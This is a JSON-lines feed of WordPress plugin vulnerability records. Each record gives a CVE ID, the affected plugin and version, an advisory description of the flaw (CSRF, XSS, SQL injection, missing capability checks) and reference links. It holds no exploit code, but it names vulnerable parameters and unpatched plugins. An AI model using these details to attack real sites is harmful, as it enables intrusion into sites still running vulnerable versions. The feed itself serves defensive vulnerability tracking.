{"CVE_ID":"CVE-2023-2517","slug":"metform","versionImpact":"3.3.2","description":"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.3.2. This is due to missing or incorrect nonce validation on the permalink_setup function. This makes it possible for unauthenticated attackers to change the permalink structure via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. While nonce verification is implemented, verification only takes place when a nonce is provided.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/plugin.php#L544\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/plugin.php#L544\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2924362%40metform%2Ftrunk&old=2910040%40metform%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2924362%40metform%2Ftrunk&old=2910040%40metform%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/metform\\\/trunk?contextall=1&old=2896914&old_path=%2Fmetform%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/metform\\\/trunk?contextall=1&old=2896914&old_path=%2Fmetform%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca66afc3-a749-4ddc-8e2f-959f65cebd45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca66afc3-a749-4ddc-8e2f-959f65cebd45?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-37992","slug":"smarty-for-wordpress","versionImpact":"3.1.35","description":"Cross-Site Request Forgery (CSRF) vulnerability in PressPage Entertainment Inc. Smarty for WordPress plugin <=\u00a03.1.35 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/smarty-for-wordpress\\\/wordpress-smarty-for-wordpress-plugin-3-1-35-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/smarty-for-wordpress\\\/wordpress-smarty-for-wordpress-plugin-3-1-35-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1074","slug":"beaver-builder-lite-version","versionImpact":"2.7.4.2","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the audio widget 'link_url' parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a49e4f5a-ac9d-4f9b-8de2-c7871da8de35?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a49e4f5a-ac9d-4f9b-8de2-c7871da8de35?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/audio\\\/includes\\\/frontend.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/audio\\\/includes\\\/frontend.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032809\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.3\\\/modules\\\/audio\\\/includes\\\/frontend.php?old=3012561&old_path=beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/audio\\\/includes\\\/frontend.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032809\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.3\\\/modules\\\/audio\\\/includes\\\/frontend.php?old=3012561&old_path=beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/audio\\\/includes\\\/frontend.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6968","slug":"the-moneytizer","versionImpact":"9.5.20","description":"The The Moneytizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 9.5.20. This is due to missing or incorrect nonce validation on multiple AJAX functions. This makes it possible for unauthenticated attackers to to update and retrieve billing and bank details, update and reset the plugin's settings, and update languages as well as other lower-severity actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14351561-bd31-4aaa-931a-e72917458013?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14351561-bd31-4aaa-931a-e72917458013?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-moneytizer\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-moneytizer\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6852","slug":"wp-multitasking","versionImpact":"0.1.12","description":"The WP MultiTasking  WordPress plugin through 0.1.12 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6c7c153-8080-40b3-85e2-604ce7c66e32\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6c7c153-8080-40b3-85e2-604ce7c66e32\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9361","slug":"bulk-image-resizer","versionImpact":"2.0.1","description":"The Bulk images optimizer: Resize, optimize, convert to webp, rename \u2026 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_configuration' function in all versions up to, and including, 2.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin options.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a189e436-e8af-4379-aa6e-2d1a4a2d4bfa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a189e436-e8af-4379-aa6e-2d1a4a2d4bfa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-image-resizer\\\/trunk\\\/includes\\\/class-bir-loader.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-image-resizer\\\/trunk\\\/includes\\\/class-bir-loader.php#L44\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11119","slug":"bne-gallery-extended","versionImpact":"1.2.1","description":"The BNE Gallery Extended plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gallery' shortcode in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bne-gallery-extended\\\/trunk\\\/bne-gallery-extended.php#L178\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bne-gallery-extended\\\/trunk\\\/bne-gallery-extended.php#L178\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191705\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191705\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bne-gallery-extended\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bne-gallery-extended\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f9277d8-ac81-4950-a1e5-4e6c6b042f84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f9277d8-ac81-4950-a1e5-4e6c6b042f84?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25221","slug":"responsive-filterable-portfolio","versionImpact":"1.0.8","description":"The Responsive Filterable Portfolio plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/responsive-filterable-portfolio\\\/tags\\\/1.0.8&new_path=\\\/responsive-filterable-portfolio\\\/tags\\\/1.0.9&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/responsive-filterable-portfolio\\\/tags\\\/1.0.8&new_path=\\\/responsive-filterable-portfolio\\\/tags\\\/1.0.9&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-filterable-portfolio\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-filterable-portfolio\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97827e26-d418-4c96-b0d0-10b92a4513bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97827e26-d418-4c96-b0d0-10b92a4513bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12314","slug":"rapid-cache","versionImpact":"1.2.3","description":"The Rapid Cache plugin for WordPress is vulnerable to Cache Poisoning in all versions up to, and including, 1.2.3. This is due to plugin storing HTTP headers in the cached data. This makes it possible for unauthenticated attackers to poison the cache with custom HTTP headers that may be unsanitized which can lead to Cross-Site Scripting.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rapid-cache\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rapid-cache\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72b777ac-1870-4588-82fe-da96a784ec81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72b777ac-1870-4588-82fe-da96a784ec81?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13875","slug":"wp-programmmanager","versionImpact":"1.2","description":"The WP-PManager WordPress plugin through 1.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82c54fb5-f1d9-4bae-a3de-d4335809b81c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82c54fb5-f1d9-4bae-a3de-d4335809b81c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3434","slug":"smtp-amazon-ses","versionImpact":"1.8","description":"The SMTP for Amazon SES \u2013 YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Email Logs in all versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270161\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270161\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-amazon-ses\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-amazon-ses\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78ac91af-4d71-43f4-b9fc-cf5e6874e7de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78ac91af-4d71-43f4-b9fc-cf5e6874e7de?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2247","slug":"wp-programmmanager","versionImpact":"1.2","description":"The WP-PManager WordPress plugin through 1.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3974c5c3-887e-46bd-aad7-4f3169bff6de\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3974c5c3-887e-46bd-aad7-4f3169bff6de\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4219","slug":"dpepress","versionImpact":"0.3","description":"The DPEPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dpe' shortcode in all versions up to, and including, 0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dpepress\\\/trunk\\\/dpepress.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dpepress\\\/trunk\\\/dpepress.php#L72\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd273dc-9de3-4863-a787-db653f2003ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd273dc-9de3-4863-a787-db653f2003ca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5084","slug":"ajax-filter-posts","versionImpact":"3.4.13","description":"The Post Grid Master plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018argsArray['read_more_text']\u2019 parameter in all versions up to, and including, 3.4.13 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/Fr1t0viski\\\/PoCs\\\/blob\\\/main\\\/XSS_GridMaster\",\"name\":\"https:\\\/\\\/github.com\\\/Fr1t0viski\\\/PoCs\\\/blob\\\/main\\\/XSS_GridMaster\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-filter-posts\\\/tags\\\/3.4.13\\\/inc\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-filter-posts\\\/tags\\\/3.4.13\\\/inc\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ajax-filter-posts\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ajax-filter-posts\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08137a9e-6e4d-4ca6-954e-e98a44b0c9be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08137a9e-6e4d-4ca6-954e-e98a44b0c9be?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28660","slug":"events-made-easy","versionImpact":"2.3.14","description":"The Events Made Easy WordPress Plugin, version <= 2.3.14 is affected by an authenticated SQL injection vulnerability in the 'search_name' parameter in the eme_recurrences_list action.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1375","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized cache deletion in versions up to, and including, 1.1.2 due to a missing capability check in the deleteCacheToolbar function . This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete the site's cache.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2893158%40wp-fastest-cache&new=2893158%40wp-fastest-cache&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2893158%40wp-fastest-cache&new=2893158%40wp-fastest-cache&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae643666-70cb-4eb4-a183-e1649264ded4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae643666-70cb-4eb4-a183-e1649264ded4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php#L866\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php#L866\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5357","slug":"instagram-for-wordpress","versionImpact":"2.1.6","description":"The Instagram for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3991d8d0-57a8-42e7-a53c-97508f7e137f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3991d8d0-57a8-42e7-a53c-97508f7e137f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instagram-for-wordpress\\\/tags\\\/2.1.6\\\/templates\\\/instagramPost.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instagram-for-wordpress\\\/tags\\\/2.1.6\\\/templates\\\/instagramPost.php#L12\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1808","slug":"shortcodes-ultimate","versionImpact":"7.0.3","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'su_qrcode' shortcode in all versions up to, and including, 7.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96769a0e-d4a9-4196-8ded-b600046c0943?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96769a0e-d4a9-4196-8ded-b600046c0943?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3041647\\\/shortcodes-ultimate\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3041647\\\/shortcodes-ultimate\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1071","slug":"ultimate-member","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/005fa621-3c49-4c23-add5-d6b7a9110055?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/005fa621-3c49-4c23-add5-d6b7a9110055?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.8.2\\\/includes\\\/core\\\/class-member-directory-meta.php?rev=3022076\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.8.2\\\/includes\\\/core\\\/class-member-directory-meta.php?rev=3022076\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.8.2\\\/includes\\\/core\\\/class-member-directory-meta.php?rev=3022076#L666\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.8.2\\\/includes\\\/core\\\/class-member-directory-meta.php?rev=3022076#L666\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.8.2\\\/includes\\\/core\\\/class-member-directory-meta.php?rev=3022076#L858\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.8.2\\\/includes\\\/core\\\/class-member-directory-meta.php?rev=3022076#L858\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-member\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-member\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3038036\\\/ultimate-member\\\/trunk\\\/includes\\\/core\\\/class-member-directory-meta.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3038036\\\/ultimate-member\\\/trunk\\\/includes\\\/core\\\/class-member-directory-meta.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6966","slug":"the-moneytizer","versionImpact":"9.5.20","description":"The The Moneytizer plugin for WordPress is vulnerable to unauthorized access of data, modification of data, and loss of data due to a missing capability check on multiple AJAX functions in the \/core\/core_ajax.php file in all versions up to, and including, 9.5.20. This makes it possible for authenticated attackers, with subscriber access and above, to update and retrieve billing and bank details, update and reset the plugin's settings, and update languages as well as other lower-severity actions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71823e36-3899-4253-a1d2-c6f8921d18dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71823e36-3899-4253-a1d2-c6f8921d18dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-moneytizer\\\/trunk\\\/core\\\/core_ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-moneytizer\\\/trunk\\\/core\\\/core_ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9350","slug":"woo-shipping-dpd-baltic","versionImpact":"1.2.83","description":"The DPD Baltic Shipping plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'search_value' parameter in all versions up to, and including, 1.2.83 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6251d0f6-b536-4122-8fdf-bb77665a4f41?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6251d0f6-b536-4122-8fdf-bb77665a4f41?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-shipping-dpd-baltic\\\/trunk\\\/includes\\\/class-dpd.php#L318\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-shipping-dpd-baltic\\\/trunk\\\/includes\\\/class-dpd.php#L318\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11091","slug":"support-svg","versionImpact":"1.1.0","description":"The Support SVG \u2013 Upload svg files in wordpress without hassle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195829\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195829\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/support-svg\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/support-svg\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9207baf-348c-4d3b-a6f0-cbfcd2624f78?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9207baf-348c-4d3b-a6f0-cbfcd2624f78?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
